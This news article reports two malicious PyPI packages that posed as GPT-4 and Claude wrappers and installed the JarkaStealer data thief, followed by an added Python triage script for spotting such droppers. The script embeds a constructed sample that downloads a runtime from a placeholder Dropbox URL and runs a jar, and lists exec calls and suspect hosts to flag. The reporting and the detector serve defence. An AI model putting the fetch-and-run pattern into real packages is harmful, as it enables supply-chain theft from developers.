Malware Hidden In Python Packages Affects Developers Worldwide

Two malicious Python packages on PyPI mimicked AI tools but secretly installed JarkaStealer malware, stealing sensitive data from over 1,700 users.

In a Rush? Here are the Quick Facts!

  • Two malicious Python packages on PyPI installed JarkaStealer malware on users’ systems.
  • The packages mimicked AI tools but secretly stole sensitive data from users.
  • JarkaStealer malware collects data like browser info, session tokens, and system details.

Kaspersky’s security researchers announced on Thursday that they had discovered two malicious Python packages on the Python Package Index (PyPI), a widely used software repository.

These packages claimed to help developers interact with advanced language models like GPT-4 Turbo and Claude AI but were actually designed to install malware called JarkaStealer.

The packages, named “gptplus” and “claudeai-eng,” appeared legitimate, with descriptions and examples showing how they could be used to create AI-powered chats.

In reality, they only pretended to work by using a demo version of ChatGPT. Their actual purpose was to deliver malware. Hidden in the code was a mechanism that downloaded and installed JarkaStealer, compromising the user’s system.

If Java wasn’t already installed, the packages would even fetch and install it from Dropbox to ensure the malware could run.

These malicious packages were available for more than a year, during which they were downloaded over 1,700 times by users in more than 30 countries.

The malware targeted confidential data such as browser information, screenshots, system details, and even session tokens for applications like Telegram, Discord, and Steam. This stolen data was sent to attackers and then erased from the victim’s computer.

JarkaStealer is a dangerous tool often used to collect sensitive information. The source code was also found on GitHub, suggesting that the people distributing it on PyPI may not have been its original authors.

PyPI administrators have since removed these malicious packages, but similar threats could appear elsewhere.

Developers who installed these packages should delete them immediately and change all passwords and session tokens used on affected devices. While the malware doesn’t persist on its own, it could have already stolen critical information.

To stay safe, developers are encouraged to carefully inspect open-source software before use, including checking the publisher’s profile and package details.

For added security, tools that detect threats in open-source components can be included in development processes to help prevent such attacks.
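One form such a check can take, added here as an example and not taken from the article or from Kaspersky’s report: a static triage pass that parses a package’s Python source with `ast` and flags the combination the article describes, a network-fetch import, a process-spawning call, and a file-sharing host in a string literal. The module lists, the host list and the sample source are constructed assumptions, and nothing from the inspected file is executed.

```python
import ast

# Top-level modules indicating network fetches, and calls that spawn processes.
NETWORK_MODULES = {"urllib", "requests", "http"}
EXEC_CALLS = {"subprocess.run", "subprocess.Popen", "subprocess.call", "os.system", "os.popen"}
# The reported packages pulled Java from Dropbox; file-sharing hosts in install code
# are a useful triage signal. Extend this for your own environment (assumed list).
SUSPECT_HOSTS = ("dropbox.com",)


def _dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    return ".".join(reversed(parts + [node.id])) if isinstance(node, ast.Name) else None


def triage_source(src: str) -> dict:
    """Static pass over one Python file; nothing from the package is executed."""
    found = {"network_imports": set(), "exec_calls": [], "suspect_urls": []}
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Import):
            mods = [a.name for a in node.names]
        elif isinstance(node, ast.ImportFrom):
            mods = [node.module or ""]
        else:
            mods = []
        found["network_imports"].update(
            m.split(".")[0] for m in mods if m.split(".")[0] in NETWORK_MODULES)
        if isinstance(node, ast.Call) and _dotted(node.func) in EXEC_CALLS:
            found["exec_calls"].append((node.lineno, _dotted(node.func)))
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if any(h in node.value for h in SUSPECT_HOSTS):
                found["suspect_urls"].append((node.lineno, node.value))
    # The combination that matches the reported dropper behaviour: fetch, then run.
    found["downloads_and_executes"] = bool(found["network_imports"]) and bool(found["exec_calls"])
    return found


# Constructed sample mirroring the described behaviour (fetch a runtime from Dropbox,
# then run a jar). The URL is a placeholder; this text is only parsed, never run.
SAMPLE = '''
import urllib.request, subprocess, shutil
def ensure_runtime():
    if shutil.which("java") is None:
        urllib.request.urlretrieve("https://www.dropbox.com/s/EXAMPLE/jre.zip", "jre.zip")
    subprocess.run(["java", "-jar", "helper.jar"])
'''
```

Run `triage_source` over each `.py` file in an unpacked sdist or wheel before installing it; a hit is a reason to read the code, not proof of malice, since legitimate installers also download and run things.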
